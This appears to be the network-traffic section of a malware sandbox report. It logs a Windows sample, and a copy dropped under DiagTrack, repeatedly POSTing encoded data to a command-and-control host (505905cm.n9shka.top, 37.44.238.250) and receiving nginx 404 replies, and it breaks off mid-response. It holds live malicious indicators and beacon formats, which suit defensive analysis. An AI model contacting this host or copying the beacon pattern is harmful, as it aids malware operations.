                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.44973537.44.238.250808380C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:22:15.940177917 CET314OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:22:16.298755884 CET344OUTData Raw: 00 03 04 00 03 0d 04 01 05 06 02 01 02 0d 01 00 00 0a 05 0a 02 05 03 0c 00 0e 0d 50 04 0f 02 08 0d 03 07 59 00 56 05 05 0d 03 07 06 06 0a 05 01 06 53 0e 09 0e 04 07 04 01 06 06 56 06 04 04 0e 00 05 0e 09 07 04 06 52 0b 01 0b 01 0f 02 0f 02 04 02
                                                                          Data Ascii: PYVSVRVQ\L}U|NaZ`byBuKUkR\^wBcY~cZx|dZz`rIhnpcws^~u~V@xC\O}ba
                                                                          Jan 8, 2025 19:22:16.805242062 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:22:16.937552929 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:16 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.44973837.44.238.250808696C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:22:22.244183064 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:22:22.595662117 CET344OUTData Raw: 05 00 01 00 03 0c 04 02 05 06 02 01 02 06 01 00 00 03 05 08 02 03 03 0e 03 06 0f 51 07 57 03 05 0a 04 05 08 02 51 07 06 0c 0a 04 07 05 00 06 07 04 07 0d 0c 0e 01 04 00 04 53 04 57 06 0a 04 0c 05 07 0a 0f 05 52 06 56 0d 07 0c 03 0d 03 0e 03 06 00
                                                                          Data Ascii: QWQSWRVWXQ\L~@~`TNcrb]b[xBWcltL|MZxlgz`Pn|wIhLe~V@BxCvA~Li
                                                                          Jan 8, 2025 19:22:22.875893116 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:22:23.010027885 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:22 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.44973937.44.238.250808836C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:22:25.984175920 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:22:26.330033064 CET344OUTData Raw: 00 04 01 05 06 0a 04 07 05 06 02 01 02 0c 01 04 00 01 05 09 02 01 03 0c 00 55 0c 06 04 03 03 02 0c 0f 04 00 03 07 04 06 0c 0a 02 04 05 50 07 0e 05 04 0e 01 0a 07 06 00 04 01 06 04 04 57 07 5c 00 57 0f 5a 00 02 04 09 0f 0f 0d 00 0f 0c 0b 09 04 54
                                                                          Data Ascii: UPW\WZT\SU\L~N|p_^wbiBuuthBr_tw_hcw_{RwKx^jktwtpje~V@{C~N~ba
                                                                          Jan 8, 2025 19:22:26.641211033 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:22:26.775063992 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          4192.168.2.44974037.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:22:48.726655960 CET315OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:22:49.080116987 CET344OUTData Raw: 00 0b 01 02 06 0c 04 02 05 06 02 01 02 02 01 05 00 02 05 09 02 0c 03 0f 01 56 0e 03 07 04 00 03 0d 54 04 0a 00 07 04 51 0d 04 06 05 05 01 07 03 06 0b 0f 59 0d 57 04 0a 06 03 06 03 04 01 00 01 00 05 0e 0b 05 52 05 51 0d 0f 0b 04 0f 50 0e 06 07 01
                                                                          Data Ascii: VTQYWRQPQRTW\L~Nk`a^wq}Lu\PoeBwR{^~`tKlsx`v|ThC`IR~u~V@{SrNrS
                                                                          Jan 8, 2025 19:22:49.359955072 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:22:49.706486940 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 8, 2025 19:22:49.707182884 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          5192.168.2.44975337.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:22:58.155389071 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 336
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:22:58.501976013 CET336OUTData Raw: 00 04 01 07 06 0b 01 00 05 06 02 01 02 05 01 06 00 03 05 09 02 0c 03 0a 07 05 0e 00 06 01 06 08 0c 07 03 0c 07 04 05 02 0c 06 07 56 05 07 05 54 05 0a 0c 59 0c 57 05 52 07 02 06 03 07 01 07 0a 00 54 0f 00 06 02 01 04 0d 0f 0d 57 0f 07 0c 53 04 06
                                                                          Data Ascii: VTYWRTWSQS\L~A|ci]c[qLa\tBk|r_`RRL|`tlosH{^e^SpCwIs[e~V@x}r}_y
                                                                          Jan 8, 2025 19:22:58.784297943 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:22:58.917509079 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          6192.168.2.44976937.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:23:01.117084026 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:01.470721006 CET344OUTData Raw: 00 00 04 05 06 00 04 02 05 06 02 01 02 07 01 07 00 06 05 0b 02 02 03 0f 02 0e 0c 02 06 01 01 07 0d 56 06 0c 03 07 07 02 0b 01 06 53 04 0a 04 03 04 07 0e 0e 0f 07 06 07 06 57 06 03 07 52 05 5c 05 01 0c 00 06 0f 01 00 0c 05 0e 52 0d 04 0c 51 06 01
                                                                          Data Ascii: VSWR\RQZX\L~@^b@`Lab\tA|ob_wRc^|MpJ{BxNzJkSR@cdw_~_~V@A{}bL~\S
                                                                          Jan 8, 2025 19:23:01.745446920 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:01.873406887 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          7192.168.2.44980537.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:23:08.411525965 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:08.767712116 CET344OUTData Raw: 05 06 01 00 06 09 01 04 05 06 02 01 02 03 01 03 00 03 05 00 02 02 03 01 03 0e 0c 0d 06 55 02 05 0d 00 04 0a 01 07 06 56 0e 0a 02 06 06 00 02 00 07 02 0d 0e 0c 02 07 52 06 04 06 03 01 0a 07 0e 03 07 0a 0f 05 00 05 09 0c 05 0b 07 0f 56 0d 04 06 54
                                                                          Data Ascii: UVRVTUW\L~ChcztLzXaQ~jYv||Bkcpy|QopzKknkR`IQ[ie~V@x}v~\[
                                                                          Jan 8, 2025 19:23:09.060656071 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:09.193443060 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          8192.168.2.44982637.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:23:11.698177099 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:12.048922062 CET344OUTData Raw: 00 01 04 00 06 08 04 02 05 06 02 01 02 06 01 04 00 03 05 00 02 05 03 00 00 01 0f 0d 07 04 01 07 0c 56 03 0c 01 03 05 00 0f 02 04 0a 00 02 05 52 04 53 0c 0f 0d 01 06 0b 07 0f 06 03 06 56 04 0f 02 01 0d 0c 05 0e 01 07 0c 00 0e 05 0f 03 0e 51 07 57
                                                                          Data Ascii: VRSVQWU\L}Pz`[rXueQQawl~sZlRQl`aZTkU`d\}e~V@B{Cv}bW
                                                                          Jan 8, 2025 19:23:12.346187115 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:12.477238894 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          9192.168.2.44984137.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:23:14.812264919 CET315OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:15.158229113 CET344OUTData Raw: 00 03 01 01 06 0f 04 01 05 06 02 01 02 07 01 03 00 04 05 09 02 0d 03 00 02 56 0e 01 06 02 01 55 0d 0f 06 0a 00 51 07 52 0f 01 05 04 07 53 05 05 06 54 0e 0c 0c 0f 07 52 05 0e 05 01 06 57 05 0b 00 53 0c 0b 07 05 04 53 0b 0f 0f 00 0f 53 0e 56 05 0d
                                                                          Data Ascii: VUQRSTRWSSSVPZR\L~|Yb`bialOk|WMcRZO|s^ol]laZkm`wtlO}O~V@Ax}TNbW
                                                                          Jan 8, 2025 19:23:15.442372084 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:15.569325924 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:15 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          10192.168.2.44985637.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:23:17.650572062 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:18.001960039 CET344OUTData Raw: 05 07 04 02 03 0d 01 0a 05 06 02 01 02 06 01 02 00 06 05 09 02 03 03 00 01 06 0e 0d 03 03 00 07 0d 51 06 5b 03 54 06 06 0b 0a 07 06 04 04 02 02 06 01 0c 5b 0a 02 05 01 07 00 07 06 05 01 05 0f 00 01 0d 01 07 51 06 04 0f 0e 0c 07 0f 51 0d 07 06 54
                                                                          Data Ascii: Q[T[QQTQV\L}Q~`a^wa}Lwv|AucUw]||xl`^{YzIkT`C`gxu~V@BxmbN~LW
                                                                          Jan 8, 2025 19:23:19.060506105 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:19.060866117 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:18 GMT
